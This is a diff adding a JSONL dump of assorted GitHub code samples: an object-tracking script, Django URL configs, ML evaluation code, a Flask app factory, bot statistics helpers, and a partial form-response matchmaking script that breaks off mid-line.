diff --git "a/3238.jsonl" "b/3238.jsonl" new file mode 100644--- /dev/null +++ "b/3238.jsonl" @@ -0,0 +1,539 @@ +{"seq_id":"4351672916","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, absolute_import\nimport os\nimport datetime\nfrom timeit import time\nimport warnings\nimport cv2\nimport numpy as np\nimport argparse\nfrom PIL import Image\nfrom yolo import YOLO\nfrom deep_sort import preprocessing\nfrom deep_sort import nn_matching\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker\nfrom tools import generate_detections as gdet\nfrom deep_sort.detection import Detection as ddet\nfrom collections import deque\nfrom keras import backend\nfrom scipy import integrate\nimport matplotlib.pyplot as plt\nfrom getCorrectImage import viewplot,blankImage,discalculation\n\nbackend.clear_session()\nap = argparse.ArgumentParser()\n# ap.add_argument(\"-i\", \"--input\", help=\"path to input video\", default=\"./test_video/test_1.mp4\")\nap.add_argument(\"-i\", \"--input\", help=\"path to input video\", default=\"./MPE_data/OneDrive_2021-08-27/MPE pre-employment aptitude test cv/images/left/frame%05d.jpg\")\nap.add_argument(\"-c\", \"--class\", help=\"name of class\", default=[\"person\", \"car\",\"bus\",\"truck\",\"train\"])\nargs = vars(ap.parse_args())\n\npts = [deque(maxlen=30) for _ in range(9999)]\nwarnings.filterwarnings('ignore')\n\n# initialize a list of colors to represent each possible class label\nnp.random.seed(100)\nCOLORS = np.random.randint(0, 255, size=(200, 3),\n dtype=\"uint8\")\n\n\ndef main(yolo):\n start = time.time()\n # Definition of the parameters\n max_cosine_distance = 0.5 # 余弦距离的控制阈值\n nn_budget = None\n nms_max_overlap = 0.3 # 非极大抑制的阈值\n\n counter = []\n # deep_sort\n model_filename = 'model_data/market1501.pb'\n encoder = gdet.create_box_encoder(model_filename, batch_size=1)\n\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n tracker = Tracker(metric)\n\n writeVideo_flag = True\n # video_path = \"./output/output.avi\"\n video_captureL = cv2.VideoCapture(args[\"input\"])\n video_captureR = cv2.VideoCapture(\"./MPE_data/OneDrive_2021-08-27/MPE pre-employment aptitude test cv/images/right/frame%05d.jpg\")\n \n\n if writeVideo_flag:\n # Define the codec and create VideoWriter object\n w = int(video_captureL.get(3))\n h = int(video_captureL.get(4))\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n out = cv2.VideoWriter('./output/output_1.avi', fourcc, 15, (w, h))\n list_file = open('detection.txt', 'w')\n frame_index = -1\n\n fps = 0.0\n img_count = 0\n\n while True:\n\n retL, frame = video_captureL.read() # frame shape 640*480*3\n retR,frameR = video_captureR.read() \n if retL != True:\n break\n t1 = time.time()\n\n imageL = Image.fromarray(frame)\n imageR = Image.fromarray(frameR)\n # imageL = Image.fromarray(frame[..., ::-1])\n # imageR = Image.fromarray(frameR[..., ::-1])\n \n imgl = cv2.cvtColor(np.asarray(imageL),cv2.COLOR_RGB2BGR) \n imgr = cv2.cvtColor(np.asarray(imageR),cv2.COLOR_RGB2BGR) \n\n depth_map = discalculation(imgl,imgr)\n # image = Image.fromarray(frame[..., ::-1]) # bgr to rgb\n boxs, class_names = yolo.detect_image(imageL)\n img_count += 1\n \n\n features = encoder(frame, boxs)\n # score to 1.0 here).\n detections = [Detection(bbox, 1.0, feature) for bbox, feature in zip(boxs, features)]\n # Run non-maxima suppression.\n boxes = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n indices = preprocessing.non_max_suppression(boxes, nms_max_overlap, scores)\n detections = [detections[i] for i in indices]\n \n # create view image\n img_view = blankImage(200, 200)\n # Call the tracker\n tracker.predict()\n tracker.update(detections)\n\n i = int(0)\n indexIDs = []\n c = []\n boxes = []\n if len(class_names) > 1:\n k = len(class_names) - 1\n for det in detections:\n bbox = det.to_tlbr()\n if k >= 0:\n cv2.putText(frame, str(class_names[k][0]), (int(bbox[0] + 10), int(bbox[1] - 20)), 0, 5e-3 * 100, (225,255,255), 2)\n k -= 1\n #cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (255, 255, 255), 2)\n \n for track in tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 1:\n continue\n # boxes.append([track[0], track[1], track[2], track[3]])\n indexIDs.append(int(track.track_id))\n counter.append(int(track.track_id))\n bbox = track.to_tlbr()\n color = [int(c) for c in COLORS[indexIDs[i] % len(COLORS)]]\n\n cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (color), 3)\n cv2.putText(frame, str(track.track_id), (int(bbox[0]), int(bbox[1] - 20)), 0, 5e-3 * 120, (color), 2)\n \n \n i += 1\n # bbox_center_point(x,y)\n center = (int(((bbox[0]) + (bbox[2])) / 2), int(((bbox[1]) + (bbox[3])) / 2))\n\n # calculate the average distance \n dis_all = depth_map[int(bbox[1]):int(bbox[3]),int(bbox[0]):int(bbox[2])]\n dis_all = dis_all.flatten()\n dis_all.sort()\n dis_sort = [k for k in dis_all if k != 0]\n start = int(len(dis_sort)*0.25)\n ave_dis = np.mean(dis_sort[start:-start])\n \n cv2.putText(frame, str(round(ave_dis,2)) + 'm', (int(bbox[0]), int(bbox[1] - 5)), 0, 5e-3 * 100, (225,0,0), 2)\n \n # create Aerial View\n viewplot(center[0],center[1],ave_dis,200,200,img_view)\n \n \n # # track_id[center]\n # pts[track.track_id].append(center)\n # thickness = 3\n # # center point\n # cv2.circle(frame, (center), 1, color, thickness)\n\n # # draw motion path\n # for j in range(1, len(pts[track.track_id])):\n # if pts[track.track_id][j - 1] is None or pts[track.track_id][j] is None:\n # continue\n # thickness = int(np.sqrt(64 / float(j + 1)) * 2)\n # cv2.line(frame, (pts[track.track_id][j - 1]), (pts[track.track_id][j]), (color), thickness)\n\n plt.imshow(img_view)\n plt.imsave(\"./view_images/view\" +str(img_count) + '.jpg', img_view)\n count = len(set(counter))\n cv2.putText(frame, \"Total Object Counter: \" + str(count), (int(20), int(120)), 0, 5e-3 * 200, (0, 255, 0), 2)\n cv2.putText(frame, \"Current Object Counter: \" + str(i), (int(20), int(80)), 0, 5e-3 * 200, (0, 255, 0), 2)\n cv2.putText(frame, \"FPS: %f\" % (fps), (int(20), int(40)), 0, 5e-3 * 200, (0, 255, 0), 3)\n cv2.namedWindow(\"YOLO3_Deep_SORT\", 0)\n cv2.resizeWindow('YOLO3_Deep_SORT', 1024, 768)\n cv2.imshow('YOLO3_Deep_SORT', frame)\n cv2.imwrite(\"./out_images/output\" +str(img_count) + '.jpg', frame)\n\n if writeVideo_flag:\n # save a frame\n out.write(frame)\n frame_index = frame_index + 1\n list_file.write(str(frame_index) + ' ')\n if len(boxs) != 0:\n for i in range(0, len(boxs)):\n list_file.write(\n str(boxs[i][0]) + ' ' + str(boxs[i][1]) + ' ' + str(boxs[i][2]) + ' ' + str(boxs[i][3]) + ' ')\n list_file.write('\\n')\n fps = (fps + (1. / (time.time() - t1))) / 2\n # print(set(counter))\n\n # Press Q to stop!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n print(\" \")\n print(\"[Finish]\")\n end = time.time()\n\n # if len(pts[track.track_id]) != None:\n # print(args[\"input\"][43:57] + \": \" + str(count) + \" \" + str(class_name) + ' Found')\n\n # else:\n # print(\"[No Found]\")\n\n video_captureL.release()\n\n if writeVideo_flag:\n out.release()\n list_file.close()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main(YOLO())\n","repo_name":"HanRunbing/object-tracking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4225786206","text":"\nfrom django.urls import path\nfrom vsview.views import AboutPageView, HomePageView, plipListPageView\n\n\nurlpatterns = [\n path('', HomePageView.as_view(), name='home'),\n path('plip', plipListPageView, name='plip_list'),\n path('about/', AboutPageView.as_view(), name='about')\n]\n","repo_name":"xxtucamarxx/lambda-web-project","sub_path":"lambda_project/vsview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21182031821","text":"# -------------------------------\n# -- Basic User Function Tags ---\n# -------------------------------\n\nUNSET_TAG = 0\n\n# When received by a worker, tells worker to do a sim eval;\n# When received by the manager, tells manager that worker is done with sim eval.\nEVAL_SIM_TAG = 1\n\n# When received by a worker, tells worker to do a gen eval;\n# When received by the manager, tells manager that worker is done with sim eval.\nEVAL_GEN_TAG = 2\n\nSTOP_TAG = 3 # Manager tells worker (or persistent user_f) to stop\nPERSIS_STOP = 4 # Manager tells persistent user_f to stop\n\n# last_message_number_rst_tag\n\ncalc_type_strings = {\n EVAL_SIM_TAG: \"sim\",\n EVAL_GEN_TAG: \"gen\",\n PERSIS_STOP: \"STOP with work\",\n None: \"No type set\",\n}\n\n# --------------------------------------\n# -- Calculation Status/Signal Tags ----\n# --------------------------------------\n\n# first_calc_status_rst_tag\nFINISHED_PERSISTENT_SIM_TAG = 11 # tells manager sim_f done persistent mode\nFINISHED_PERSISTENT_GEN_TAG = 12 # tells manager gen_f done persistent mode\nMAN_SIGNAL_FINISH = 20 # Kill tasks and shutdown worker\nMAN_SIGNAL_KILL = 21 # Kill running task - but don't stop worker\nWORKER_KILL = 30 # Worker kills not covered by a more specific case\nWORKER_KILL_ON_ERR = 31 # Worker killed due to an error in results\nWORKER_KILL_ON_TIMEOUT = 32 # Worker killed on timeout\nTASK_FAILED = 33 # Calc had tasks that failed\nWORKER_DONE = 34 # Calculation was successful\n# last_calc_status_rst_tag\nCALC_EXCEPTION = 35 # Reserved: Automatically used if user_f raised an exception\n\nMAN_KILL_SIGNALS = [MAN_SIGNAL_FINISH, MAN_SIGNAL_KILL]\n\ncalc_status_strings = {\n UNSET_TAG: \"Not set\",\n FINISHED_PERSISTENT_SIM_TAG: \"Persis sim finished\",\n FINISHED_PERSISTENT_GEN_TAG: \"Persis gen finished\",\n MAN_SIGNAL_FINISH: \"Manager killed on finish\",\n MAN_SIGNAL_KILL: \"Manager killed task\",\n WORKER_KILL_ON_ERR: \"Worker killed task on Error\",\n WORKER_KILL_ON_TIMEOUT: \"Worker killed task on Timeout\",\n WORKER_KILL: \"Worker killed\",\n TASK_FAILED: \"Task Failed\",\n WORKER_DONE: \"Completed\",\n CALC_EXCEPTION: \"Exception occurred\",\n None: \"Unknown Status\",\n}\n# last_calc_status_string_rst_tag\n","repo_name":"Libensemble/libensemble","sub_path":"libensemble/message_numbers.py","file_name":"message_numbers.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"4891671420","text":"import torch, sys\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Subset\nimport torch.nn.functional as F\nfrom funcy import chunks\nfrom sklearn import metrics\nfrom utils.text_loader import load_vocabs\nfrom utils.image_loader import load_image_dataset\nfrom utils.helper import AverageMeter, accuracy\nfrom models.templates import prompts, generate_texts\nimport configs\nfrom tqdm import tqdm\nimport numpy as np\n\n\ndef load_label_embs(model, lang, langs, word_data, data_mode, num_prompts):\n vocab = load_vocabs(lang, langs, word_data, data_mode)\n texts = generate_texts(prompts[word_data][lang], vocab, k=num_prompts)\n K = num_prompts\n text_embeddings = []\n for batch_texts in tqdm(chunks(128*K, texts)):\n with torch.no_grad():\n batch_txt_embs = model.encode_text(batch_texts)\n # ensemble\n batch_size = len(batch_texts) // K\n batch_txt_embs = batch_txt_embs.view(batch_size, K, batch_txt_embs.shape[-1])\n batch_txt_embs = batch_txt_embs.mean(dim=1)\n # normalize after averaging\n batch_txt_embs = F.normalize(batch_txt_embs, dim=-1)\n text_embeddings.append(batch_txt_embs)\n text_embeddings = torch.cat(text_embeddings, dim=0)\n return text_embeddings\n \ndef validate(model, text_embeddings, dataloader, device, logit_scale=1.0):\n text_embeddings = text_embeddings.type(torch.FloatTensor).to(device)\n tqdm_object = tqdm(dataloader, total=len(dataloader))\n top5, top1 = AverageMeter(), AverageMeter()\n for (images, labels) in tqdm_object:\n # print(batch_idx)\n labels = labels.long().to(device)\n with torch.no_grad():\n image_embeddings = model.encode_image(images.to(device))\n image_embeddings = image_embeddings.type(torch.FloatTensor).to(device)\n image_embeddings = F.normalize(image_embeddings, dim=-1)\n logits = image_embeddings @ text_embeddings.T * logit_scale\n _, pred = logits.topk(1, 1, True, True)\n pred = pred.t()\n precs = accuracy(logits, labels, topk=(1, 5))\n top1.update(precs[0].item(), images.size(0))\n top5.update(precs[1].item(), images.size(0))\n tqdm_object.set_postfix(top1_acc=top1.avg)\n torch.cuda.empty_cache()\n\n print(\"Classification on\", top1.avg, top5.avg)\n return top1.avg, top5.avg\n\n\n\n\ndef evaluate_multilabel_classification(image_data, lang, opts):\n loss = torch.nn.MultiLabelSoftMarginLoss()\n model, text_embeddings, dataloader = load_image_and_class(image_data, lang, opts, multilabel=True)\n tqdm_object = tqdm(dataloader, total=len(dataloader))\n model.eval()\n\n total = 0\n num_examples = 0\n \n gts = {i:[] for i in range(0, configs.num_classes[image_data])}\n preds = {i:[] for i in range(0, configs.num_classes[image_data])}\n with torch.no_grad():\n for (images, labels) in tqdm_object:\n labels = labels.long().to(opts.device)\n images = images.to(opts.device)\n image_features = model.image_encoder(images)\n image_embeddings = model.image_projection(image_features)\n image_embeddings = F.normalize(image_embeddings, dim=-1)\n logits = image_embeddings @ text_embeddings.T * np.exp(model.temperature)\n l = loss(logits, labels).item()\n total += l\n num_examples += image_features.size()[0]\n output = torch.sigmoid(logits)\n pred = output.squeeze().data.cpu().numpy()\n gt = labels.squeeze().data.cpu().numpy()\n for label in range(0, configs.num_classes[image_data]):\n gts[label].extend(gt[:,label])\n preds[label].extend(pred[:,label])\n\n print(\"Average Multilabel Loss is: {}\".format(total/num_examples))\n \n FinalMAPs = []\n for i in range(0, configs.num_classes[image_data]):\n precision, recall, _ = metrics.precision_recall_curve(gts[i], preds[i])\n FinalMAPs.append(metrics.auc(recall, precision))\n\n # Print AUC for each class\n indices = [i for i in range(configs.num_classes[image_data])]\n indices = sorted(indices, key = lambda x: FinalMAPs[x])\n with open(\"../results/AUC.txt\", \"w\") as f:\n for idx in indices:\n f.write(\"{}: {}\\n\".format(idx, FinalMAPs[idx]))\n \n return FinalMAPs\n\n","repo_name":"UW-Madison-Lee-Lab/walip","sub_path":"src/tclip/clip_ops.py","file_name":"clip_ops.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70717939923","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n # path(\"\", views.index, name=\"index\"),\n # path(\"genre/\", views.view_genre, name=\"index\"),\n # path(\"movie/\", views.view_movie, name=\"index\"),\n path(\"\", views.index, name=\"index\"),\n path(\"search\", views.SearchView.as_view(), name=\"search\"),\n path(\"genre/\", views.GenreView.as_view(), name=\"genre\"),\n path(\"movie/\", views.MovieView.as_view(), name=\"movie\"),\n path(\"register\", views.register_request, name=\"register\"),\n path(\"login\", views.login_request, name=\"login\"),\n path(\"logout\", views.logout_request, name=\"logout\"),\n path(\"rated\", views.RatedView.as_view(), name=\"rated\"),\n path(\"search\", views.search_movies, name=\"search_movies\"),\n path('rate_movie/', views.rate_movie, name='rate_movie'),\n path('add_comment/', views.add_comment, name='add_comment'),\n path('movie//edit/', views.MovieEditView.as_view(), name='movie_edit'),\n path('movie_add', views.movie_add, name='movie_add'),\n path('movie//add_image/', views.add_image, name='add_image'),\n path('video', views.video.as_view(), name='video'),\n path(\"videopage/\", views.VideoPage.as_view(), name=\"videopage\"),\n]","repo_name":"Dezert01/adv","sub_path":"django-tutorial-koziol/venv/Scripts/movielens/userview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27275858289","text":"from db.base import Session\n\nfrom db.devotional import Devotional\nfrom db.subscriber import Subscriber\nfrom db.subscription import Subscription\nfrom db.statistics import Statistics\n\nfrom utils.consts import STATISTICS_UNIQUE_ID\nfrom utils.utils import get_epoch\nimport utils.consts as consts\n\ndef subscribers():\n session = Session()\n count = session.query(Subscriber).count()\n session.close()\n return count\n\ndef subscriptions():\n session = Session()\n count = session.query(Subscription).count()\n session.close()\n return count\n\ndef geo_skipped():\n session = Session()\n count = session.query(Subscriber).filter(Subscriber.time_zone == 'skipped').count()\n session.close()\n return count\n\ndef subscriptions_by_material():\n sbd = {}\n session = Session()\n for subscription_title in consts.DEVOTIONALS_KEYBOARD:\n subscription_title = subscription_title[0]\n sbd[subscription_title] = session.query(Subscription).filter(Subscription.title == subscription_title).count()\n session.close()\n return sbd\n\ndef statistics_setup():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n if stats == None:\n session.add(Statistics())\n session.commit()\n session.close()\n\ndef statistics():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n session.close()\n return stats\n\ndef set_last_registered():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.last_registered = get_epoch()\n session.commit()\n session.close()\n\ndef set_last_subscribed():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.last_subscribed = get_epoch()\n session.commit()\n session.close()\n\ndef add_sent(tosum=1):\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.sent += tosum\n session.commit()\n session.close()\n\ndef add_unsubscribed():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.unsubscribed += 1\n session.commit()\n session.close()\n\ndef add_quiz():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.quizzes += 1\n session.commit()\n session.close()\n\nstatistics_setup()","repo_name":"rykovv/devotional-telegram-bot","sub_path":"actors/actuary.py","file_name":"actuary.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"14746163781","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns = [\n path('become-vendor/', views.become_vendor, name='become_vendor'),\n path('vendor-admin/', views.vendor_admin, name='vendor_admin'),\n path('vendor-order/', views.order, name='vendor_order'),\n path('add-product/', views.add_product, name='add_product'),\n path('edit-product//', views.edit_product, name='edit_product'),\n path('edit-order//', views.edit_order, name='edit_order'),\n path('update-vendor/', views.update_vendor, name='update_vendor'),\n path('vendor-account', views.vendor_account, name='vendor_account' ),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('login/', auth_views.LoginView.as_view(template_name='vendor/login.html'), name='vendor_login'),\n path('', views.vendors, name='vendors'),\n \n path('/', views.vendor, name='vendor'),\n]\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"choudhary2001/ecommerce","sub_path":"vendor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39357522375","text":"# -*- coding: utf-8 -*-\nimport io\nimport os\nimport sys\nimport logging\nfrom pathlib import Path\n\nfrom flask import Flask\nfrom yaml import load as yload\n\nfrom api_li3ds.app import api, init_apis\nfrom api_li3ds.database import Database\n\n__version__ = '0.1.dev0'\n\n\nLOG_LEVELS = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL\n}\n\n\ndef load_yaml_config(filename):\n \"\"\"\n Open Yaml file, load content for flask config and returns it as a python dict\n \"\"\"\n content = io.open(filename, 'r').read()\n return yload(content).get('flask', {})\n\n\ndef create_app():\n \"\"\"\n Creates application.\n\n :returns: flask application instance\n \"\"\"\n app = Flask(__name__)\n cfgfile = os.environ.get('API_LI3DS_SETTINGS')\n if cfgfile:\n app.config.update(load_yaml_config(cfgfile))\n else:\n try:\n cfgfile = (Path(__file__).parent.parent / 'conf' / 'api_li3ds.yml').resolve()\n except FileNotFoundError:\n print(Path(__file__).parent.parent / 'conf' / 'api_li3ds.yml')\n app.logger.warning('no config file found !!')\n sys.exit(1)\n app.config.update(load_yaml_config(str(cfgfile)))\n\n # setting log level\n if app.config['DEBUG']:\n app.logger.setLevel(LOG_LEVELS['debug'])\n else:\n app.logger.setLevel(LOG_LEVELS['info'])\n\n app.logger.debug('loading config from {}'.format(cfgfile))\n\n if 'HEADER_API_KEY' not in app.config:\n app.logger.fatal('HEADER_API_KEY missing')\n sys.exit(1)\n\n if not app.config['HEADER_API_KEY'] or len(app.config['HEADER_API_KEY']) < 12:\n app.logger.fatal('HEADER_API_KEY cannot be empty or '\n 'too short (at least 12 characters)')\n sys.exit(1)\n\n # load extensions\n # be carefull to load apis before blueprint !\n init_apis()\n api.init_app(app)\n Database.init_app(app)\n return app\n","repo_name":"LI3DS/api-li3ds","sub_path":"api_li3ds/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41904088962","text":"# placeholder added reisitance prediciton model code\n\nimport pandas as pd\n\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score\n\n#from sklearn.externals import joblib\n\ndf = pd.read_csv(\"dataset1.csv\")\n\n#preprocessing\ndf = df.dropna( axis=0, how =\"any\")\n\n#print(df.info())\n\ndf_X = df.drop([\"time\",\"label\"], axis=1)\ndf_Y = df[\"label\"]\n\n#split for training\nX_train, X_test, Y_train, Y_test = train_test_split( df_X, df_Y, test_size=0.20, random_state=42)\n\n# train model\nregr = linear_model.LinearRegression()\nregr.fit(X_train, Y_train)\n\n#joblib.dump(regr, 'lin_regr_model_pad.pkl')\n\n#predict results\nY_pred = regr.predict(X_test)\n\n#evaluate model\nr2 = r2_score(Y_test, Y_pred)\nmse = mean_squared_error(Y_test, Y_pred)\nmae = mean_absolute_error(Y_test, Y_pred)\n\nprint(\"mean absolute error: {:.5f}, mean squared error: {:.5f}, r2 score: {:.5f}\".format(mae,mse,r2)) # '0.20'\n\n# # Plot outputs\nplt.scatter(np.arange(X_test.__len__()), Y_test, color='black')\nplt.plot(np.arange(X_test.__len__()), Y_pred, color='blue', linewidth=2)\n\nplt.xticks(())\nplt.yticks(())\n\nplt.show()","repo_name":"dolittle-casestudies/ocfev","sub_path":"model/predict_added_resistance.py","file_name":"predict_added_resistance.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32052663290","text":"# first machine learning study\n# this code is a reproduction of this one https://www.youtube.com/watch?v=i_LwzRVP7bg\n# I reproduced it only for a first study\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport os\n\n# get the absolute path of the current script\nscript_path = os.path.dirname(os.path.abspath(__file__))\nfile_path = os.path.join(script_path, \"magic04.csv\")\n\n# add header\ncols = [\"fLength\", \"fWidth\", \"fSize\", \"fConc\", \"fConc1\", \"fAsym\", \"fM3Long\", \"fM3Trans\", \"fAlpha\", \"fDist\", \"class\"]\n\ndf = pd.read_csv(file_path, names=cols)\ndf[\"class\"] = (df[\"class\"] == \"g\").astype(int)\nprint(df.head())\n\nfor label in cols[:-1]:\n plt.hist(df[df[\"class\"] == 1][label], color = 'blue', label='gamma', alpha=0.7, density=True)\n plt.hist(df[df[\"class\"] == 0][label], color = 'red', label='hadron', alpha=0.7, density=True)\n plt.title(label)\n plt.ylabel(\"Probability\")\n plt.xlabel(label)\n plt.legend()\n plt.show()\n \n# train, validation and test datasets\ntrain, valid, test = np.split(df.sample(frac=1), [int(0.6*len(df)), int(0.8*len(df))])\n\n# to be completed...\n","repo_name":"yannawr/Python-Studies","sub_path":"Machine Learning/machineLearning.py","file_name":"machineLearning.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36640999054","text":"import pandas as pd\nimport numpy as np\n\n#Display all the columns\npd.set_option(\"display.max_columns\", 100)\n\n#Read in the data sheet named 'Tik_Tok.csv'\ndf = pd.read_csv ('Tik_Tok.csv')\n\n#add a position column\ndf['Position'] = df.index.values + 1\n\n#Rename the columns because the original names are too long to work with\n# pc = preferred way of contact\n# c = Contact\n# PG = preferred gender\n\ndf.columns = ['Timestamp', 'Name', 'Age', 'Gender', 'PG', 'C', 'Email', 'Position']\n\n#This code was not needed\n\nNames = df['Name']\nAges = df['Age']\nGenders = df['Gender']\nGenderP = df['GP']\nContactP = df['PC']\nContactInfo = df['C']\nEmail = df['Email']\nPosition = df['Position']\n\nclass Player(object):\n def __init__(self,name, age, gender, genderp, contactway, contact, email, position):\n self.name = name\n self.age = age\n self.gender = gender\n self.genderp = genderp\n self.contactway = contactway\n self.contact = contact\n self.email = email\n self.position = position\n\nfor person in df:\n players = Player(Names, Ages, Genders, GenderP, ContactP, ContactInfo, Email, Position)\n\n\ndf_under_18 = df[df['Age'] < 18]\n\n#Under 18 Male and Female filter\ndf_M_under_18 = df_under_18[df_under_18['Gender'] == 'Male']\ndf_F_under_18 = df_under_18[df_under_18['Gender'] == 'Female']\n\n\n'''------------------------------Same Gender under 18-----------------------------'''\n\n#Under 18 Males that prefer Males\ndf_M_under_18_PM = df_M_under_18[df_M_under_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_M_under_PM = {}\nk = 0\n\nwhile len(df_M_under_18_PM) > 1:\n\n df_M_under_18_PM.reset_index(drop=True, inplace=True)\n dic_M_under_PM[\"Match_M_under_PM{0}\".format(k)] = df_M_under_18_PM.iloc[:2]\n\n df_M_under_18_PM.reset_index(drop=True, inplace=True)\n df_M_under_18_PM = df_M_under_18_PM.drop([df_M_under_18_PM.index[0], df_M_under_18_PM.index[1]])\n\n k += 1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#Under 18 females that Prefer Females\ndf_F_under_18_PF = df_F_under_18[df_F_under_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_F_under_PF = {}\nk = 0\nwhile len(df_F_under_18_PF) > 1:\n\n df_F_under_18_PF.reset_index(drop=True, inplace=True)\n dic_F_under_PF[\"Match_F_under_PF{0}\".format(k)] = df_F_under_18_PF.iloc[:2]\n\n df_F_under_18_PF.reset_index(drop=True, inplace=True)\n df_F_under_18_PF = df_F_under_18_PF.drop([df_F_under_18_PF.index[0], df_F_under_18_PF.index[1]])\n\n k += 1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''------------------------------Opposite Gender under 18-----------------------------'''\n\n#Under 18 Males that prefer Females\ndf_M_under_18_PF = df_M_under_18[df_M_under_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#Under 18 Females that prefer Males\ndf_F_under_18_PM = df_F_under_18[df_F_under_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_MF_under_PFM = {}\nk = 0\nwhile len(df_M_under_18_PF) > 1 and len(df_F_under_18_PM) > 1:\n df_M_under_18_PF.reset_index(drop=True, inplace=True)\n df_F_under_18_PM.reset_index(drop=True, inplace=True)\n\n dic_MF_under_PFM[\"Match_MF_under_PFM{0}\".format(k)] = [df_M_under_18_PF.iloc[:1], df_F_under_18_PM.iloc[:1]]\n\n df_M_under_18_PF.reset_index(drop=True, inplace=True)\n df_F_under_18_PM.reset_index(drop=True, inplace=True)\n\n df_M_under_18_PF = df_M_under_18_PF.drop([df_M_under_18_PF.index[0]])\n df_F_under_18_PM = df_F_under_18_PM.drop([df_F_under_18_PM.index[0]])\n\n k += 1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''-----------------------------------Either under 18-------------------------------------------'''\n\n\ndf_E_under_18_PE = df_under_18[df_under_18['PG'] == 'Either']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_E_under_PE = {}\nk = 0\n\nwhile len(df_E_under_18_PE) > 1:\n\n df_E_under_18_PE.reset_index(drop=True, inplace=True)\n dic_E_under_PE[\"Match_E_under_PE{0}\".format(k)] = df_E_under_18_PE.iloc[:2]\n\n df_E_under_18_PE.reset_index(drop=True, inplace=True)\n df_E_under_18_PE = df_E_under_18_PE.drop([df_E_under_18_PE.index[0], df_E_under_18_PE.index[1]])\n\n k += 